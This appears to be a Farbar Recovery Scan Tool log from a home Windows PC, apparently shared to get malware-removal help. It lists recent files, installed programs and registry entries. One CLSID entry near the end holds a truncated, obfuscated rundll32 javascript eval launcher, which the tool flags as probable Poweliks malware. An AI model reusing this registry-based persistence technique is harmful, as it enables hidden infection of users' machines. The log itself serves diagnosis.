2014-10-14 16:20 - 2014-07-06 21:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 16:20 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 16:20 - 2014-07-06 21:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 16:20 - 2014-07-06 21:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 16:20 - 2014-07-06 21:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 16:20 - 2014-07-06 21:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 16:20 - 2014-07-06 21:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 16:20 - 2014-06-27 20:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 16:20 - 2014-06-27 20:21 - 00533200 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 16:20 - 2014-06-27 20:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-14 16:19 - 2014-09-25 18:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-14 16:19 - 2014-09-18 22:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-14 16:19 - 2014-09-18 21:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-14 16:19 - 2014-09-18 21:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-14 16:19 - 2014-09-18 21:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-14 16:19 - 2014-09-18 21:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-14 16:19 - 2014-09-18 21:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-14 16:19 - 2014-09-18 21:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-14 16:19 - 2014-09-18 21:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-14 16:19 - 2014-09-18 21:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-14 16:19 - 2014-09-18 21:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-14 16:19 - 2014-09-18 21:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-14 16:19 - 2014-09-18 21:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-14 16:19 - 2014-09-18 21:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-14 16:19 - 2014-09-18 20:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-14 16:19 - 2014-09-18 20:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-14 16:19 - 2014-09-18 20:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-14 16:19 - 2014-09-18 20:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-14 16:19 - 2014-09-18 20:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-14 16:19 - 2014-09-18 20:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-14 16:19 - 2014-09-18 19:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-14 16:19 - 2014-09-18 19:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-14 16:19 - 2014-09-18 19:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-14 16:18 - 2014-09-17 22:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-14 16:18 - 2014-09-17 21:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-14 16:17 - 2014-09-12 21:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 16:17 - 2014-09-12 21:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-14 16:17 - 2014-09-04 01:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-14 16:17 - 2014-09-04 01:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-14 16:17 - 2014-07-16 22:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-14 16:17 - 2014-07-16 22:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-14 16:17 - 2014-07-16 22:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-14 16:17 - 2014-07-16 22:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-14 16:17 - 2014-07-16 22:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-14 16:17 - 2014-07-16 22:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-14 16:17 - 2014-07-16 22:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-14 16:17 - 2014-07-16 22:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-14 16:17 - 2014-07-16 21:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-14 16:17 - 2014-07-16 21:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-14 16:17 - 2014-07-16 21:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-14 16:17 - 2014-07-16 21:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-14 16:17 - 2014-07-16 21:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-14 16:17 - 2014-07-16 21:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-14 16:17 - 2014-07-16 21:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-14 16:17 - 2014-07-16 21:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-07 17:52 - 2014-10-07 17:52 - 00013762 _____ () C:\Users\Ryan\Desktop\contacts.vcf
2014-10-07 17:51 - 2014-10-07 17:51 - 00000000 ____D () C:\Users\Ryan\AppData\Local\{30047CF2-3191-430C-8641-B11BF8FDDAFF}
2014-10-03 23:37 - 2014-10-03 23:37 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2014-09-30 17:47 - 2014-09-24 22:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-09-30 17:47 - 2014-09-24 21:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-10-30 03:05 - 2012-06-09 03:40 - 02061892 _____ () C:\Windows\WindowsUpdate.log
2014-10-30 03:01 - 2012-05-04 14:49 - 00072658 _____ () C:\Windows\setupact.log
2014-10-30 03:01 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-30 02:39 - 2012-01-02 05:18 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-30 02:36 - 2013-10-27 15:17 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job
2014-10-30 01:08 - 2009-07-14 00:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-30 01:08 - 2009-07-14 00:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-30 01:00 - 2014-04-12 02:42 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-29 17:36 - 2013-10-27 15:17 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job
2014-10-29 16:49 - 2014-04-12 02:42 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-29 16:49 - 2014-04-12 02:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-29 16:49 - 2014-04-12 02:42 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-29 16:45 - 2012-08-10 12:38 - 00000000 ____D () C:\Users\Ryan\AppData\Local\CrashDumps
2014-10-29 14:05 - 2012-08-06 00:52 - 00000000 ____D () C:\Users\Ryan\Documents\Bluetooth Folder
2014-10-22 17:31 - 2013-10-27 15:17 - 00003872 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA
2014-10-22 17:31 - 2013-10-27 15:17 - 00003476 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core
2014-10-21 11:22 - 2012-08-28 23:49 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Microsoft Help
2014-10-21 10:30 - 2013-10-16 06:44 - 00000000 ____D () C:\Users\Ryan\Documents\Postcolonial Medicine
2014-10-15 19:46 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\rescache
2014-10-15 16:38 - 2013-10-25 18:22 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-15 16:29 - 2009-07-14 01:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-15 16:27 - 2009-07-14 00:45 - 00342240 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-15 16:25 - 2014-05-07 00:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 16:25 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-15 16:25 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-15 03:01 - 2012-08-28 23:49 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-15 02:57 - 2014-05-09 17:11 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 02:54 - 2014-05-09 17:11 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-13 17:36 - 2012-09-17 12:31 - 00000000 ____D () C:\Users\Ryan\Documents\Personal Statement Docs
2014-10-13 16:01 - 2013-02-09 16:54 - 00000000 ____D () C:\Users\Ryan\Documents\Poems
2014-10-12 23:37 - 2012-08-06 00:51 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Skype
2014-10-07 18:38 - 2013-01-18 23:39 - 00708608 ___SH () C:\Users\Ryan\Desktop\Thumbs.db
2014-10-03 23:37 - 2014-03-06 04:01 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-10-03 23:37 - 2012-01-02 04:58 - 00000000 ____D () C:\ProgramData\Skype
2014-10-01 11:11 - 2014-04-12 02:42 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-01 11:11 - 2014-04-12 02:42 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-01 11:11 - 2014-04-12 02:42 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
Some content of TEMP:
====================
C:\Users\Ryan\AppData\Local\Temp\install_flashplayer11x32ax_gtbd_chrd_dn_aih.exe
C:\Users\Ryan\AppData\Local\Temp\InstHelper.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u67-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\pslist.exe
C:\Users\Ryan\AppData\Local\Temp\vlc-2.1.3-win32.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2014-10-27 17:31
==================== End Of Log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-10-2014
Ran by Ryan at 2014-10-30 03:07:38
Running from C:\Users\Ryan\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.122 - Atheros)
Atheros WLAN Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 7.0 - Atheros)
Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cirrus Logic Audio (HKLM-x32\...\{3A69FD31-5EE7-42C9-918B-81C07AA21043}) (Version: 10.14.0.0 - Cirrus Logic)
Cirrus Logic Audio x64 (Version: 7.25.38.0 - Cirrus Logic) Hidden
Common Desktop Agent (Version: 1.62.0 - OEM) Hidden
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (HKLM-x32\...\{55D003F4-9599-44BF-BA9E-95D060730DD3}) (Version: 15.4.5722.2 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Garmin ANT Agent (HKLM\...\{20B0E07B-12EA-4BAB-A3B1-E17D7568EB6F}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GIMP 2.8.2 (HKLM\...\GIMP-2_is1) (Version: 2.8.2 - The GIMP Team)
Google Talk Plugin (HKLM-x32\...\{95763F66-297E-30CE-9728-6D0F20BF97F5}) (Version: 5.38.5.0 - Google)
GoToMeeting 5.3.0.1009 (HKCU\...\GoToMeeting) (Version: 5.3.0.1009 - CitrixOnline)
Intel(R) Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36279 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.10.1464 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2752 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.4.220 - Intel Corporation)
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Français) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
NVIDIA Graphics Driver 296.28 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 296.28 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.12.0213 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0213 - NVIDIA Corporation)
Perfect Photo Suite 7.0.1 (HKLM-x32\...\{6727F16E-6BF0-4E73-AC73-958A382AA09E}) (Version: 7.0.1 - onOne Software)
Premium Sound HD (HKLM\...\{3007FF9F-5B2C-41FF-8BFC-08BF25DB2681}) (Version: 1.12.3000 - SRS Labs, Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.52.203.2012 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30130 - Realtek Semiconductor Corp.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.21.00(2/3/2014) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.60.40.03 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
SES Driver (HKLM\...\{D8CC254C-C671-4664-9A38-FA368D1E2C97}) (Version: 1.0.0 - Western Digital)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 1.10.1 - Tweaking.com)
USB3Setup (HKLM-x32\...\{4814105D-5756-4CD7-9430-ADA474A3E192}) (Version: 1.0.4.220 - VIZIO)
VIZIO Wireless Driver (HKLM-x32\...\{3A9C1D7A-A227-442F-B296-14AEBC4E85C1}) (Version: 1.00.0001 - VIZIO)
VIZIO Wireless Touchpad (HKLM-x32\...\{3F0E78CA-735E-446D-8E60-69C6CA27EC95}) (Version: 1.00.0001 - VIZIO)
VIZIO_FN_Key_Utility (HKLM-x32\...\{106AEB0E-1FF7-44BD-B510-6CF9A3934FAC}) (Version: 1.3.15 - VIZIO)
VIZIOUtility version 1.0 (HKLM-x32\...\{4F949BD9-1E99-40C7-9102-C67E2D384995}_is1) (Version: 1.0 - VIZIO)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
Windows Driver Package - Dynastream Innovations (libusb0) LibUsbDevices (07/07/2009 1.12.2) (HKLM\...\24DA573F901348FFDFF7717497830D45BE0C362E) (Version: 07/07/2009 1.12.2 - Dynastream Innovations)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Driver Package - Western Digital Technologies (WDC_SAM) WDC_SAM (01/19/2011 1.0.0009.0) (HKLM\...\4CA7CFBB29889F25ACB3DF6E3A42BAE29EB43B20) (Version: 01/19/2011 1.0.0009.0 - Western Digital Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zune (HKLM\...\Zune) (Version: 04.07.1404.01 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Program Files (x86)\Citrix\GoToMeeting\1009\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
